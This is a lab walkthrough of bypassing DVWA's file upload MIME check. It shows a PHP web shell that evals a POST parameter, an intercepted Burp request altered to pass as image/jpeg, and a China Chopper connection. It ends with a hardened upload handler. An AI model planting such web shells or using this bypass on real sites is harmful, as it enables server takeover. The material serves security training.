(1). The target site's file upload check requires the file's MIME type to be image/jpeg. Sample code:
<?php
if (isset($_POST['Upload'])) {
    // Destination path is built from the client-supplied file name.
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // 'type' is copied from the Content-Type of the uploaded part in the request.
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    // The only checks: declared MIME type and size.
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)) {
        if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    } else {
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
(2). Start Burp Suite in Kali and turn on its proxy intercept-and-modify feature. The proxy listens on 192.168.147.132:8080.
(3). In the browser on the local machine, with no proxy configured yet, select the trojan file muma.php on the file upload page:
<?php @eval($_POST['pass']);?>
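(4). Set the local browser's proxy to the Burp Suite proxy above, make sure intercept is switched on in Burp Suite, then click Upload. Burp Suite now shows the intercepted request, whose raw content is: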
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Host: 192.168.147.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------68278927234299128771152654658
Content-Length: 507
Origin: http://192.168.147.131
Connection: close
Referer: http://192.168.147.131/dvwa/vulnerabilities/upload/
Cookie: security=low; security=medium; PHPSESSID=vl1eiur1jcp2kadhjun9tjogq7
Upgrade-Insecure-Requests: 1

-----------------------------68278927234299128771152654658
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------68278927234299128771152654658
Content-Disposition: form-data; name="uploaded"; filename="muma.php"
Content-Type: application/octet-stream

<?php @eval($_POST['pass']);?>
-----------------------------68278927234299128771152654658
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------68278927234299128771152654658--
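In the raw request we change Content-Type: application/octet-stream to Content-Type: image/jpeg and click Forward to actually send it. The browser then reports that the upload succeeded. Test with a one-click connection from China Chopper (中国菜刀).
Remember that the Content-Type here is not the same as the one you see directly in the browser. This is a typical example from the OWASP Broken Web Applications Project.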
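The check in step (1) passes because $_FILES['uploaded']['type'] is whatever the client puts in the part's Content-Type. A hardened counterpart follows as an added example; it is not DVWA's code or the author's. It assumes the fileinfo and GD extensions are available, and the function name store_jpeg_upload and the directory /var/www/private_uploads are hypothetical.

```php
<?php
// Added example, not DVWA's code. store_jpeg_upload() and the upload
// directory are hypothetical; requires the fileinfo and GD extensions.
function store_jpeg_upload(array $file, string $upload_dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('No valid upload received.');
    }
    // Measure the stored temp file rather than relying on request fields.
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size >= 100000) {
        throw new RuntimeException('File size not accepted.');
    }
    // $file['type'] is ignored: it is copied from the part's Content-Type
    // header, which the client controls. Sniff the file's bytes instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'image/jpeg') {
        throw new RuntimeException('Only JPEG images are accepted.');
    }
    // A file can start with JPEG magic bytes and still carry other data,
    // so decode it and write a fresh JPEG; re-encoding drops metadata
    // and any trailing bytes.
    $image = @imagecreatefromjpeg($file['tmp_name']);
    if ($image === false) {
        throw new RuntimeException('File does not decode as a JPEG.');
    }
    // Name and extension are generated server-side, never taken from
    // $file['name'], so a ".php" name cannot reach the filesystem.
    $dest = rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.jpg';
    if (!imagejpeg($image, $dest, 90)) {
        throw new RuntimeException('Could not store the image.');
    }
    return $dest;
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        // Hypothetical directory outside the web root, not served as PHP.
        store_jpeg_upload($_FILES['uploaded'], '/var/www/private_uploads');
        echo '<pre>Image uploaded.</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
```

With this handler, the request from step (4) is rejected at the content-sniffing step whatever Content-Type the part declares, and nothing is ever written under the client's file name.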